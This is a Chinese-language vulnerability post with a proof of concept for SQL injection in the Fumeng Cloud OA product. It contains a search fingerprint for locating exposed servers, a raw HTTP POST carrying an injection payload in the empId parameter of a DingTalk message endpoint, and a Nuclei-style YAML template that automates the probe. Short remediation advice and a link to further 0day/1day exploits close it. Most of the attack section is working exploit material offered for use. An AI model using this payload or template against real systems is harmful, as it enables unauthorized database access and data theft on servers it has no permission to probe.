》》》产品描述《《《

        孚盟与阿里强强联手将最受青睐的经典C系列产品打造成全新的孚盟云产品，让用户可以用云模式实现信息化管理，让用户的异地办公更加流畅，大大降低中小企业在信息化上成本，用最小的投入享受大型企业级别的信息化服务，使中小企业在网络硬件环境、内部贸易过程管理与快速通关形成一套完整解决方案。

---

》》》漏洞描述《《《

   Web程序中对于用户提交的参数未做过滤直接拼接到SQL语句中执行，导致参数中的特殊字符破坏了SQL语句原有逻辑，攻击者可以利用该漏洞执行任意SQL语句，如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。

---

》》》搜索语句《《《

body="hidLicResult" && body="hidProductID"

---

》》》漏洞复现《《《

POC

POST /m/Dingding/Ajax/AjaxSendDingdingMessage.ashx HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
X-Requested-With: XMLHttpRequest
Content-Length: 51

action=SendDingMeg_Mail&empId=2'+and+1=@@VERSION--+

yaml

id: 孚盟云oa AjaxSendDingdingMessage sql注入漏洞

info:
  name: Potential SQL Injection in Dingding Message Endpoint
  author: Kelichen
  severity: high
  description: |
    Potential SQL Injection vulnerability in the Dingding Message Endpoint.
    This template attempts to exploit the vulnerability by injecting a SQL payload.
  reference:
    - 

http:
  - raw:
      - |
        POST /m/Dingding/Ajax/AjaxSendDingdingMessage.ashx HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate, br
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        X-Requested-With: XMLHttpRequest
        Content-Length: 51

        action=SendDingMeg_Mail&empId=2'+and+1=@@VERSION--+

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "Microsoft SQL Server"
          - "MySQL"
          - "PostgreSQL"
          - "Oracle"
        part: body

---

》》》修复建议《《《

如非必要，禁止公网访问该系统

通过防火墙等安全设备设置访问策略，设置白名单访问。

升级产品到最新版本

---

-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

更多最新0day/1day POC&EXP移步----->Kelichen1113/POC-EXP (github.com)

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------